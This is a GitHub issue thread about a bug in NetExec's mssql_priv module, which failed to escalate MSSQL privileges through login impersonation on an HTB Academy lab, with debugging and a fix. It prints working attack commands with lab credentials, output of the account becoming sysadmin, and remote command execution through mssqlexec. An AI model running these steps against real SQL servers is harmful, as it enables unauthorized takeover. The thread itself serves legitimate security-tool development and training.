mssql_priv module can't find any path to privesc #273

Closed
sepauli opened this issue Apr 22, 2024 · 6 comments
Labels: bug (Something isn't working)

Comments

sepauli (Contributor) commented Apr 22, 2024

Describe the bug
When trying to escalate the privileges via the mssql_priv module I get the error "can't find any path to privesc", but it works with exactly the same arguments in crackmapexec.

To Reproduce

└─$ docker run --network host --rm -it netexec --verbose --debug mssql 10.129.190.104 -u myusername -p 'mysecurepass' -M mssql_priv -o ACTION=privesc
...
[*] Copying default configuration file
[21:15:19] INFO     Socket info: host=10.129.190.104, hostname=10.129.190.104, kerberos=False, ipv6=False, link-local ipv6=False                       connection.py:105
           INFO     NTLM challenge:                                                                                                                         mssql.py:120
MSSQL       10.129.190.104  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:mydomain.tld)
           INFO     Encryption required, switching to TLS                                                                                                     tds.py:873
MSSQL       10.129.190.104  1433   DC01             [+] mydomain.tld\myusername:mysecurepass 
MSSQL_PRIV                                          [*] MYDOMAIN\myusername can impersonate: julio
MSSQL_PRIV                                          [*] julio can impersonate: MYDOMAIN\robert
MSSQL_PRIV                                          [-] can't find any path to privesc

When using crackmapexec it works as expected.

└─$ crackmapexec --verbose mssql 10.129.190.104 -u myusername -p mysecurepass -M mssql_priv -o ACTION=privesc
DEBUG:root:Passed args:
{'aesKey': None,
 'clear_obfscripts': False,
 'connectback_host': None,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'domain': None,
 'execute': None,
 'export': None,
 'fail_limit': None,
 'force_ps32': False,
 'get_file': None,
 'gfail_limit': None,
 'hash': [],
 'jitter': None,
 'kdcHost': None,
 'kerberos': False,
 'list_modules': False,
 'local_auth': False,
 'module': 'mssql_priv',
 'module_options': ['ACTION=privesc'],
 'mssql_query': None,
 'no_bruteforce': False,
 'no_output': False,
 'obfs': False,
 'password': ['mysecurepass'],
 'port': 1433,
 'protocol': 'mssql',
 'ps_execute': None,
 'put_file': None,
 'server': 'https',
 'server_host': '0.0.0.0',
 'server_port': None,
 'show_module_options': False,
 'target': ['10.129.190.104'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'use_kcache': False,
 'username': ['myusername'],
 'verbose': True}
DEBUG:asyncio:Using selector: EpollSelector
DEBUG:root:Running
DEBUG:root:Started thread poller
MSSQL       10.129.190.104  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:mydomain.tld)
INFO:impacket:Encryption required, switching to TLS
DEBUG:root:add_credential(credtype=plaintext, domain=MYDOMAIN, username=myusername, password=mysecurepass, groupid=None, pillaged_from=None) => None
MSSQL       10.129.190.104  1433   DC01             [+] mydomain.tld\myusername:mysecurepass 
MSSQL_PR... 10.129.190.104  1433   DC01             [+] MYDOMAIN\myusername can impersonate julio (sysadmin)
MSSQL_PR... 10.129.190.104  1433   DC01             [+] MYDOMAIN\myusername is now a sysadmin! (Pwn3d!)
DEBUG:root:Stopped thread poller

NetExec info

  • OS: Kali
  • Version of nxc: 1.1.0 - nxc4u - 1f8a0ef
  • Installed from: github
@NeffIsBack NeffIsBack added the bug Something isn't working label Apr 23, 2024
NeffIsBack (Contributor):
Not really obvious at first what might be the problem here.
Is this a domain on some HTB box or something else where I can debug the bug myself?
Otherwise, could you maybe pull down the repo manually, do pipx install . -e --force and check out the past commits, to see when it worked the last time?
https://github.com/Pennyw0rth/NetExec/commits/main/nxc/modules/mssql_priv.py

NeffIsBack (Contributor):
Which cme version is this? Latest from the apt repositories?

sepauli (Contributor, author) commented Apr 24, 2024

I encountered the error in the HTB Academy module “Using CrackMapExec” in the task “MSSQL Enumeration and Attacks”.
In addition to crackmapexec, I also run the tasks with NetExec.
According to the Discord, other people have also recently run into the error here.

I have tested the older versions/commits of NetExec.
https://github.com/Pennyw0rth/NetExec/commits/main/nxc/modules/mssql_priv.py

I reinstalled the OS once and ran NetExec in a Docker container to avoid any hiccup from other programs, but unfortunately it does not work.

crackmapexec is the oldest version in the apt repository of Kali Linux.
Version : 5.4.0
Codename: Indestructible G0thm0g

Unfortunately, I could not find an HTB box on the HTB Lab with this type of privilege escalation to test.

NeffIsBack (Contributor):

Thanks for the info!

@mpgn do you have access to htb academy? Any chance you could take a look at it?

@sepauli sepauli mentioned this issue Apr 26, 2024
sepauli (Contributor, author) commented Apr 26, 2024

I found the issue.

The privileged user for the impersonation cannot be found, because there is an issue in the "is_admin_user" function.
Due to the try/except statement the admin privileges are always wrong, because the if statement cannot be executed:

TypeError: int() argument must be a string, a bytes-like object or a real number, not 'list'

I could successfully test my changes.

└─$ docker run --privileged --network host netexec-fixed mssql 10.129.204.177 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
...
MSSQL       10.129.204.177  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.204.177  1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01!
MSSQL_PRIV                                          [+] INLANEFREIGHT\robert can impersonate: julio (sysadmin)
MSSQL_PRIV                                          [+] INLANEFREIGHT\robert is now a sysadmin! (Pwn3d!)
└─$ docker run --privileged --network host netexec-fixed mssql 10.129.204.177 -u robert -p Inlanefreight01! -x whoami
...
MSSQL       10.129.204.177  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.204.177  1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01! (Pwn3d!)
MSSQL       10.129.204.177  1433   DC01             [+] Executed command via mssqlexec
MSSQL       10.129.204.177  1433   DC01             inlanefreight\svc_mssql
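A constructed illustration (added here, not NetExec's own code) of the failure mode sepauli describes: the sysadmin query comes back as a list of rows, `int()` on that list raises the TypeError, a bare except turns every admin check into False, and the impersonation-chain search therefore reports no path. The row shape, the `IS_SRVROLEMEMBER('sysadmin')` query, the user names and the impersonation edges are assumptions made for the example.

```python
# Constructed model (added example, not NetExec's own code) of the bug
# described above: int() on a list of rows raises TypeError, a bare except
# swallows it, and the sysadmin check silently returns False for everyone.

# Assumed result shape of a query like SELECT IS_SRVROLEMEMBER('sysadmin'):
# a list of row dicts rather than a bare integer (constructed sample data).
SYSADMIN_ROWS = {
    "julio": [{"": 1}],
    "robert": [{"": 0}],
    "myusername": [{"": 0}],
}

# Constructed impersonation edges mirroring the chain shown in the issue.
IMPERSONATE = {
    "myusername": ["julio"],
    "julio": ["robert"],
}

def is_admin_user_buggy(user: str) -> bool:
    """Bare except hides the TypeError from int(list): always False."""
    try:
        return int(SYSADMIN_ROWS[user]) == 1  # TypeError: int() of a list
    except Exception:
        return False

def is_admin_user_fixed(user: str) -> bool:
    """Unpack the single row and column before converting to int."""
    rows = SYSADMIN_ROWS.get(user, [])
    if not rows:
        return False
    value = next(iter(rows[0].values()))
    return int(value) == 1

def find_privesc_path(start: str, is_admin) -> list:
    """Depth-first walk over impersonation edges to the first sysadmin; [] if none."""
    seen = set()
    def walk(user, path):
        if user in seen:
            return []
        seen.add(user)
        if is_admin(user):
            return path
        for target in IMPERSONATE.get(user, []):
            found = walk(target, path + [target])
            if found:
                return found
        return []
    return walk(start, [start])
```

With the buggy check the walk from myusername visits julio and robert without ever seeing a sysadmin and returns [], which is the "can't find any path to privesc" outcome; with the fixed check it stops at julio.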

NeffIsBack (Contributor):

Closing as it was fixed in #277
